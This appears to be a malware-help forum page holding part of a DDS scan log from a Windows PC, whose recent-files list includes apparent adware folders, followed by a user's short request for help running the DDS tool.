S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 vmicvmsession;Hyper-V PowerShell Direct Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 w3logsvc;W3C Logging Service;C:\WINDOWS\System32\svchost.exe -k apphost [2016-7-16 44496]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 WD Backup Drive Helper;WD Backup Drive Helper;C:\Windows\SysWOW64\dllhost.exe [2016-7-16 19808]
S3 WD Backup Snapshot;WD Backup Snapshot;C:\Windows\SysWOW64\dllhost.exe [2016-7-16 19808]
S3 WDC_SAM;WD SCSI Pass Thru driver;C:\WINDOWS\System32\drivers\wdcsam64.sys [2015-11-12 26880]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2016-10-1 719360]
S3 WdNisDrv;Windows Defender Network Inspection System Driver;C:\WINDOWS\System32\drivers\WdNisDrv.sys [2016-7-16 123232]
S3 WdNisSvc;Windows Defender Network Inspection Service;C:\Program Files\Windows Defender\NisSrv.exe [2016-7-16 347328]
S3 WEPHOSTSVC;Windows Encryption Provider Host Service;C:\WINDOWS\System32\svchost.exe -k WepHostSvcGroup [2016-7-16 44496]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2016-7-16 32096]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2016-7-16 64864]
S3 wisvc;Windows Insider Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 workfolderssvc;Work Folders;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S3 WpnUserService_87960;Windows Push Notifications User Service_87960;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 XblAuthManager;Xbox Live Auth Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 XblGameSave;Xbox Live Game Save;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2016-12-9 258560]
S3 XboxNetApiSvc;Xbox Live Networking Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2016-9-13 43520]
S4 AppVClient;Microsoft App-V Client;C:\WINDOWS\System32\AppVClient.exe [2016-10-1 823136]
S4 shpamsvc;Shared PC Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S4 tzautoupdate;Auto Time Zone Updater;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S4 UevAgentDriver;UevAgentDriver;C:\WINDOWS\System32\drivers\UevAgentDriver.sys [2016-7-16 40288]
S4 UevAgentService;User Experience Virtualization Service;C:\WINDOWS\System32\AgentService.exe [2016-7-16 1227264]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== Created Last 30 ================
.
2017-01-07 23:36:53 -------- d-----w- C:\ProgramData\AppalmaaZ
2017-01-07 23:20:38 -------- d-----w- C:\Program Files (x86)\Common Files\Inlux
2017-01-07 23:20:34 -------- d-----w- C:\ProgramData\Logic Handler
2017-01-07 23:20:33 -------- d-----w- C:\ProgramData\Zaamlas
2017-01-07 23:20:29 -------- d-----w- C:\Users\King\AppData\Local\DailyBee
2017-01-07 23:20:25 1938538 ----a-w- C:\Users\King\AppData\Roaming\Fixcore.bin
2017-01-07 23:20:16 -------- d-----w- C:\ProgramData\Zaamla
2017-01-07 23:20:10 629760 ----a-w- C:\Users\King\AppData\Roaming\RedKayphase.exe
2017-01-07 23:20:05 -------- d-----w- C:\ProgramData\NetworkPacketManitor
2017-01-07 23:20:03 -------- d-----w- C:\Users\King\AppData\Roaming\DailyBee
2017-01-07 23:19:48 -------- d-----w- C:\Users\King\AppData\Roaming\HDWallPaper
2017-01-07 23:19:47 -------- d-----w- C:\WINDOWS\SysWow64\sstmp
2017-01-07 23:19:47 -------- d-----w- C:\WINDOWS\System32\sstmp
2017-01-07 23:19:46 909944 ----a-w- C:\WINDOWS\System32\drivers\NetUtils2016.sys
2017-01-07 23:19:46 625272 ----a-w- C:\WINDOWS\System32\NetUtils2016.dll
2017-01-07 23:19:46 470592 ----a-w- C:\WINDOWS\SysWow64\NetUtils2016.exe
2017-01-07 23:19:45 -------- d-----w- C:\Program Files (x86)\HDWallPaper
2017-01-07 23:19:32 -------- d-----w- C:\Program Files (x86)\4baf5696-ef63-4372-a50c-30bd8cd532291483831172
2017-01-07 23:18:42 825536 ---h--w- C:\Program Files (x86)\Internet Explorer\i??pl?r?.b?t.exe
2017-01-07 23:15:19 -------- d-----w- C:\Users\King\AppData\Local\4kdownload.com
2017-01-06 02:41:30 -------- d---a-w- C:\Program Files (x86)\TumblRipper
2017-01-06 02:33:03 -------- d-----w- C:\Users\King\AppData\Local\jzab.de
2017-01-04 23:39:26 -------- d-----w- C:\Users\King\AppData\Local\IsolatedStorage
2017-01-04 23:37:44 -------- d-----w- C:\Users\King\AppData\Roaming\Intuit
2017-01-04 23:36:14 -------- d---a-w- C:\Program Files (x86)\Common Files\Intuit
2017-01-04 23:36:05 -------- d-----w- C:\Program Files (x86)\TurboTax
2017-01-04 23:35:54 -------- d-----w- C:\ProgramData\Intuit
2016-12-27 18:37:07 -------- d-----w- C:\Program Files (x86)\Dropbox
2016-12-27 18:23:52 -------- d-----w- C:\WINDOWS\Panther
2016-12-21 18:15:36 75888 ----a-w- C:\WINDOWS\System32\drivers\dbx-stable.sys
2016-12-21 18:15:36 75888 ----a-w- C:\WINDOWS\System32\drivers\dbx-dev.sys
2016-12-21 18:15:36 75888 ----a-w- C:\WINDOWS\System32\drivers\dbx-canary.sys
2016-12-21 18:15:36 42096 ----a-w- C:\WINDOWS\System32\DbxSvc.exe
2016-12-16 23:23:59 -------- d-----w- C:\Program Files (x86)\GUMCB42.tmp
2016-12-15 13:03:31 85984 ----a-w- C:\WINDOWS\System32\drivers\klupd_klif_kimul.sys
2016-12-15 03:19:48 872408 ----a-w- C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe
2016-12-15 03:19:48 231880 ----a-w- C:\Program Files (x86)\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll
2016-12-15 02:57:00 -------- d-----w- C:\Program Files\iPod
2016-12-15 02:56:59 -------- d---a-w- C:\Program Files\iTunes
.
==================== Find3M ====================
.
2016-12-11 23:56:25 835576 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
2016-12-11 23:56:25 177656 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
2016-12-10 01:52:21 180224 ----a-w- C:\WINDOWS\System32\enrollmentapi.dll
2016-12-09 10:42:15 1637728 ----a-w- C:\WINDOWS\System32\appraiser.dll
2016-12-09 10:42:14 137568 ----a-w- C:\WINDOWS\System32\acmigration.dll
2016-12-09 10:34:34 894096 ----a-w- C:\WINDOWS\System32\winresume.exe
2016-12-09 10:34:34 1051112 ----a-w- C:\WINDOWS\System32\winresume.efi
2016-12-09 10:33:26 1354320 ----a-w- C:\WINDOWS\System32\winload.efi
2016-12-09 10:33:26 1173496 ----a-w- C:\WINDOWS\System32\winload.exe
2016-12-09 10:32:11 7816032 ----a-w- C:\WINDOWS\System32\ntoskrnl.exe
2016-12-09 10:30:39 377184 ----a-w- C:\WINDOWS\System32\drivers\clfs.sys
2016-12-09 10:29:23 2681200 ----a-w- C:\WINDOWS\System32\CoreUIComponents.dll
2016-12-09 10:28:24 764392 ----a-w- C:\WINDOWS\System32\CoreMessaging.dll
2016-12-09 10:27:38 172528 ----a-w- C:\WINDOWS\System32\sspicli.dll
2016-12-09 10:20:21 2677544 ----a-w- C:\WINDOWS\System32\d3d10warp.dll
2016-12-09 10:20:20 2189664 ----a-w- C:\WINDOWS\System32\drivers\dxgkrnl.sys
2016-12-09 10:20:16 658784 ----a-w- C:\WINDOWS\System32\drivers\dxgmms2.sys
2016-12-09 10:20:13 402272 ----a-w- C:\WINDOWS\System32\drivers\dxgmms1.sys
2016-12-09 10:20:12 1738560 ----a-w- C:\WINDOWS\System32\WindowsCodecs.dll
2016-12-09 10:19:35 1293152 ----a-w- C:\WINDOWS\System32\LicenseManager.dll
2016-12-09 10:19:21 168424 ----a-w- C:\WINDOWS\System32\bcrypt.dll
2016-12-09 10:18:47 624048 ----a-w- C:\WINDOWS\System32\drivers\cng.sys
2016-12-09 10:18:21 2913144 ----a-w- C:\WINDOWS\System32\combase.dll
2016-12-09 10:18:16 1100128 ----a-w- C:\WINDOWS\System32\hvix64.exe
2016-12-09 10:18:15 1267512 ----a-w- C:\WINDOWS\System32\WinTypes.dll
2016-12-09 10:18:14 811872 ----a-w- C:\WINDOWS\System32\hvloader.exe
2016-12-09 10:18:12 947552 ----a-w- C:\WINDOWS\System32\hvloader.efi
2016-12-09 10:18:09 989024 ----a-w- C:\WINDOWS\System32\hvax64.exe
2016-12-09 10:15:26 8168000 ----a-w- C:\WINDOWS\System32\Windows.Media.Protection.PlayReady.dll
2016-12-09 10:15:18 1988560 ----a-w- C:\WINDOWS\System32\mfmp4srcsnk.dll
2016-12-09 10:14:50 1274712 ----a-w- C:\WINDOWS\System32\ole32.dll
2016-12-09 10:14:33 241504 ----a-w- C:\WINDOWS\System32\CloudExperienceHost.dll
2016-12-09 10:11:15 2048496 ----a-w- C:\WINDOWS\SysWow64\CoreUIComponents.dll
2016-12-09 10:10:58 1461200 ----a-w- C:\WINDOWS\System32\user32.dll
2016-12-09 10:10:40 1572768 ----a-w- C:\WINDOWS\System32\gdi32full.dll
2016-12-09 10:09:27 455520 ----a-w- C:\WINDOWS\System32\securekernel.exe
2016-12-09 10:01:59 2323728 ----a-w- C:\WINDOWS\SysWow64\d3d10warp.dll
2016-12-09 10:01:43 1503544 ----a-w- C:\WINDOWS\SysWow64\WindowsCodecs.dll
2016-12-09 10:01:08 861024 ----a-w- C:\WINDOWS\SysWow64\LicenseManager.dll
2016-12-09 10:00:58 106896 ----a-w- C:\WINDOWS\SysWow64\bcrypt.dll
2016-12-09 09:59:25 846560 ----a-w- C:\WINDOWS\SysWow64\WinTypes.dll
2016-12-09 09:59:24 2166752 ----a-w- C:\WINDOWS\SysWow64\combase.dll
2016-12-09 09:57:01 1852720 ----a-w- C:\WINDOWS\SysWow64\mfmp4srcsnk.dll
2016-12-09 09:57:00 6668040 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.Protection.PlayReady.dll
2016-12-09 09:56:15 959112 ----a-w- C:\WINDOWS\SysWow64\ole32.dll
2016-12-09 09:52:21 1435896 ----a-w- C:\WINDOWS\SysWow64\user32.dll
2016-12-09 09:52:21 1415752 ----a-w- C:\WINDOWS\SysWow64\gdi32full.dll
2016-12-09 09:51:08 117240 ----a-w- C:\WINDOWS\SysWow64\sspicli.dll
2016-12-09 09:47:29 22563328 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2016-12-09 09:45:47 40448 ----a-w- C:\WINDOWS\System32\WordBreakers.dll
2016-12-09 09:45:43 206848 ----a-w- C:\WINDOWS\System32\win32k.sys
2016-12-09 09:42:29 227328 ----a-w- C:\WINDOWS\System32\cdd.dll
2016-12-09 09:41:22 380928 ----a-w- C:\WINDOWS\System32\wincorlib.dll
2016-12-09 09:41:06 32768 ----a-w- C:\WINDOWS\SysWow64\WordBreakers.dll
2016-12-09 09:40:38 147968 ----a-w- C:\WINDOWS\SysWow64\win32k.sys
2016-12-09 09:38:39 324608 ----a-w- C:\WINDOWS\System32\Windows.ApplicationModel.LockScreen.dll
2016-12-09 09:37:29 261632 ----a-w- C:\WINDOWS\System32\indexeddbserver.dll
2016-12-09 09:37:10 411136 ----a-w- C:\WINDOWS\System32\facecredentialprovider.dll
2016-12-09 09:37:01 49152 ----a-w- C:\WINDOWS\System32\Windows.UI.Shell.dll
2016-12-09 09:36:56 425984 ----a-w- C:\WINDOWS\System32\aadcloudap.dll
2016-12-09 09:36:32 410112 ----a-w- C:\WINDOWS\System32\AppXDeploymentClient.dll
2016-12-09 09:36:09 3059200 ----a-w- C:\WINDOWS\System32\msi.dll
2016-12-09 09:36:05 231936 ----a-w- C:\WINDOWS\SysWow64\Windows.ApplicationModel.LockScreen.dll
2016-12-09 09:36:02 6285312 ----a-w- C:\WINDOWS\System32\Windows.Media.dll
2016-12-09 09:34:52 822784 ----a-w- C:\WINDOWS\SysWow64\Chakradiag.dll
2016-12-09 09:34:31 288768 ----a-w- C:\WINDOWS\SysWow64\wincorlib.dll
2016-12-09 09:33:42 3777536 ----a-w- C:\WINDOWS\System32\MFMediaEngine.dll
2016-12-09 09:33:37 1589760 ----a-w- C:\WINDOWS\System32\msdtctm.dll
2016-12-09 09:32:18 635904 ----a-w- C:\WINDOWS\SysWow64\jscript9diag.dll
2016-12-09 09:31:22 3689984 ----a-w- C:\WINDOWS\SysWow64\msi.dll
2016-12-09 09:31:20 198656 ----a-w- C:\WINDOWS\SysWow64\indexeddbserver.dll
2016-12-09 09:31:11 313856 ----a-w- C:\WINDOWS\SysWow64\AppXDeploymentClient.dll
2016-12-09 09:30:32 19413504 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2016-12-09 09:30:31 4612608 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.dll
2016-12-09 09:29:51 4749312 ----a-w- C:\WINDOWS\System32\SettingsHandlers_nt.dll
2016-12-09 09:28:55 1004544 ----a-w- C:\WINDOWS\System32\enterprisecsps.dll
2016-12-09 09:28:12 3306496 ----a-w- C:\WINDOWS\SysWow64\MFMediaEngine.dll
2016-12-09 09:27:55 5114368 ----a-w- C:\WINDOWS\System32\cdp.dll
2016-12-09 09:27:36 981504 ----a-w- C:\WINDOWS\System32\Windows.Security.Authentication.OnlineId.dll
2016-12-09 09:26:32 8129536 ----a-w- C:\WINDOWS\System32\Chakra.dll
2016-12-09 09:26:01 1692672 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.onecore.dll
2016-12-09 09:25:28 376832 ----a-w- C:\WINDOWS\System32\CryptoWinRT.dll
2016-12-09 09:24:21 2275840 ----a-w- C:\WINDOWS\System32\AppXDeploymentServer.dll
2016-12-09 09:22:27 1490944 ----a-w- C:\WINDOWS\System32\lsasrv.dll
2016-12-09 09:22:06 2820096 ----a-w- C:\WINDOWS\System32\InputService.dll
2016-12-09 09:22:02 2688512 ----a-w- C:\WINDOWS\System32\Windows.UI.Logon.dll
2016-12-09 09:21:48 4746752 ----a-w- C:\WINDOWS\System32\jscript9.dll
2016-12-09 09:21:42 3616768 ----a-w- C:\WINDOWS\System32\win32kfull.sys
2016-12-09 09:21:31 1512960 ----a-w- C:\WINDOWS\System32\win32kbase.sys
2016-12-09 09:21:04 716800 ----a-w- C:\WINDOWS\System32\ShareHost.dll
2016-12-09 09:20:36 730624 ----a-w- C:\WINDOWS\System32\fveapi.dll
2016-12-09 09:20:35 3198464 ----a-w- C:\WINDOWS\SysWow64\cdp.dll
2016-12-09 09:20:33 6044160 ----a-w- C:\WINDOWS\SysWow64\Chakra.dll
2016-12-09 09:20:32 172544 ----a-w- C:\WINDOWS\System32\DeviceEnroller.exe
2016-12-09 09:20:05 187392 ----a-w- C:\WINDOWS\System32\mdmregistration.dll
2016-12-09 09:19:46 433664 ----a-w- C:\WINDOWS\System32\TextInputFramework.dll
2016-12-09 09:19:45 1121280 ----a-w- C:\WINDOWS\System32\aadtb.dll
2016-12-09 09:19:43 261120 ----a-w- C:\WINDOWS\System32\Windows.UI.Core.TextInput.dll
2016-12-09 09:19:32 85504 ----a-w- C:\WINDOWS\System32\EditBufferTestHook.dll
2016-12-09 09:19:32 119296 ----a-w- C:\WINDOWS\System32\InputLocaleManager.dll
.
============= FINISH: 11:52:20.38 ===============

Attached Files

attach.txt (11.8 KB)

↧

Trying to run DDS

January 8, 2017, 12:09 pm

≫ Next: "App Explorer Updated" on Startup

≪ Previous: Malware/Spyware on my computer

When I try to run DDS under the 'first steps' link. Running as admin it says "program not meant to run in compatibility mode, program shall now exit". When check the properties, it says for type of file: screensaver (.scr) and description: DDS (Doesn't do squat), which is really strange. I need a computer checkup please.

↧